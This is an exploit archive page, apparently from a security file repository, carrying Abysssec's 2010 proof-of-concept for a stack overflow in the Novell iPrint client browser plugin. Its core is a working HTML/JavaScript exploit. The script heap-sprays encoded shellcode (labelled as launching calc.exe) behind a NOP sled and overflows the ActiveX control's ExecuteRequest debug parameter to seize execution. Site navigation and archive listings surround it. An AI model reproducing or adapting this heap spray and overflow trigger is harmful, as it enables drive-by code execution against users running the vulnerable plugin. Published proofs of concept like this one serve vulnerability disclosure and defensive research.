Month Of Abysssec Undisclosed Bugs - Novell iPrint

Month Of Abysssec Undisclosed Bugs - Novell iPrint: Posted Sep 15, 2010; Authored by Abysssec, Shahin | Site abysssec.com; Month Of Abysssec Undisclosed Bugs - The Novell iPrint client browser plug-in suffers from a parameter stack overflow vulnerability.; tags | exploit, overflow; SHA-256 | dd737bde8415b87650489f93bc877b5818c8df50c8c4b2c35f369008ca968b8b; Download | Favorite | View

Month Of Abysssec Undisclosed Bugs - Novell iPrint

<!--
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/
 
http://www.exploit-db.com/moaub-14-novell-iprint-client-browser-plugin-executerequest-debug-parameter-stack-overflow/
 
 
  Title            :  Novell iPrint Client Browser Plugin ExecuteRequest debug Parameter Stack Overflow
  Version          :  iPrint Client plugin v5.32 (XP SP3)
  Analysis         :  http://www.abysssec.com
  Vendor           :  http://www.Novell.com
  Impact           :  Critical
  Contact          :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter          :  @abysssec
  MOAUB Number     : 
-->
<object ID='target' classid='clsid:36723f97-7aa0-11d4-8919-ff2d71d0d32c'>
 
</object>
<script >
     
     // Calc.exe
     shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
                    '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
                    '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
                    '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
                    '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
                    '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
                    '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
                    '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');
                       
     nops=unescape('%u9090%u9090');
     headersize =20;
     slackspace= headersize + shellcode.length;
     while(nops.length< slackspace) nops+= nops;
     fillblock= nops.substring(0, slackspace);
     block= nops.substring(0, nops.length- slackspace);
     while( block.length+ slackspace<0x50000) block= block+ block+ fillblock;
     memory=new Array();
     for( counter=0; counter<200; counter++) memory[counter]= block + shellcode;
     ret='';
     for( counter=0; counter<=250; counter++) ret+=unescape("%0a%0a%0a%0a");    
    op = "op-client-interface-version";
    dbg = "debug=";
    target.ExecuteRequest (op, dbg+ret);
     
</script>
<html>
 
</html>

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Month Of Abysssec Undisclosed Bugs - Novell iPrint

Month Of Abysssec Undisclosed Bugs - Novell iPrint

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Month Of Abysssec Undisclosed Bugs - Novell iPrint

Share This

Month Of Abysssec Undisclosed Bugs - Novell iPrint

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems